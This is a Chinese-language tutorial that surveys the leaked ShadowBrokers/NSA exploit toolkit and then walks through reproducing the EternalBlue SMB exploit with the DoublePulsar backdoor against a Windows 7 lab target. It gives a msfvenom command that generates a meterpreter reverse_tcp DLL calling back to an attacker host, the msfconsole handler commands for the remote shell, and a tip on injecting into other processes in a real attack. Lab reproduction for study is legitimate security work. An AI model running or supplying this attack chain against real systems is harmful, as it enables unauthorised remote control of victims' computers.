ShadowBrokers方程式工具包浅析
一、解密后的工具包:
其中Windows目录包括Windows利用工具和相关攻击代码,swift目录中是银行攻击的一些证据,oddjob目录是植入后门等相关文档。
Windows目录:(包含了各种漏洞利用工具,在exploits中包含了丰富的漏洞利用工具,可影响windows多个平台)
三个比较重要的文件:exploits,fuzzbunch,specials
A:exploits(漏洞利用工具)
Explodingcan IIS漏洞利用工具,只对Windows 2003有影响
Eternalromance SMB 和 NBT漏洞利用工具,影响端口139和445
Emphasismine 通过IMAP漏洞攻击,攻击的默认端口为143
Englishmansdentist 通过SMTP漏洞攻击,默认端口25
Erraticgopher 通过RPC漏洞攻击,端口为445
Eskimoroll 通过kerberos漏洞进行攻击,默认攻击端口88
Eclipsedwing MS08-67漏洞利用工具
Educatedscholar MS09-050漏洞利用工具
Emeraldthread MB和 Netbios 漏洞利用工具,使用445端口和 139端口
Zippybeer SMTP漏洞利用工具,默认端口 445
Eternalsynergy SMB漏洞利用工具,默认端口 445
Esteemaudit RDP漏洞利用工具,默认攻击端口为3389
B:fuzzbunch:类似于msf漏洞利用平台,python编写
C:specials:
ETERNALBLUE :利用SMB漏洞,攻击开放445端口的windows机器
ETERNALCHAMPION :利用SMB漏洞,攻击开放445端口的windows机器
ODDJOB目录:支持向如下系统(BITSversions.xlsx)中植入后门代码,可以对抗avira和norton的检测
SWIFT文件夹:存放一些金融信息系统被攻击的一些信息。
二、ShadowBroker释放的NSA工具部分(windows)fb.py复现
复现开放445端口,smb漏洞
1.环境准备:(同一网段)
攻击机:win7 x64 安装python2.6 pywin32
靶机:win7 x64 关闭防火墙,开放445端口,开启SMB服务(查看服务是否生效,445端口是否在监听 netstat -ano)
kali3:用于生成reverse shell 的dll
(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.38.129 LPORT=8089 -f dll > c.dll)
在windows利用工具目录下创建listeningposts目录,看清楚了是window利用工具目录,不是c:window目录
2.工具使用
双击fb.py进入,设置Target
ip(被攻击机器)IP地址是,Callback IP(回调地址)也就是运行fb.py框架的IP地址,指定logs目录,第一次运行时创建工程目录win2k8(用于保存攻击日志,名称随意)
然后输入use eternalblue
一路回车,在需要设置的选项选择对应的选项,如选择对应的系统版本,mode选择1(FB),协议选择SMB,其他默认,然后执行提示eternalblue successed
执行成功后会在系统中留下一个后门,我们可以使用doublepulsar插件中的uninstall功能卸载后门
接着使用use doublepulsar,一路回车到选择服务类型,选择SMB,系统选择x64,然后选择想执行的动作选择2 (rundll),即function后面输入2,回车:
接着回到kali,在root账户下来生成注入的dll
命令:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.38.129 LPORT=8089 -f dll > c.dll
注意:默认是生成32位的dll,我们需要生成64位的所以需要指定x64,LHOST为用于监听的ip,即kali的ip,端口随意
将生成的c.dll文件拷贝到攻击机c盘根目录
接着之前的操作来配置dllpayload的路径即c:\\c.dll,需要输入反弹shell需要注入的进程和命令行进程,由于已经有默认设置,我们直接回车就好了(当然,在真实攻击中,最好是注入到其他进程中)
回车到执行操作停下:
切换到kali系统,然后进入msfconsole
# msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.38.129
msf > set LPORT 8089
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
到此开始监听了,
然后回到攻击机,开始执行操作,我们会在kali界面看到反弹的shell
接下来就可以开始操作对方电脑了(百度metrtpreter的用法)
思考:
1.傻瓜式一建攻击,NSA12年就写出了这样的工具,那现在会有什么更厉害的呢?
2.据说此次NSA泄露的工具DoublePulsar在全世界已感染3,6万台设备,你还不赶紧更新吗?
3.该工具任何人都可以使用,小白千万别去干坏事哦,毕竟网络安全法已出,你懂的。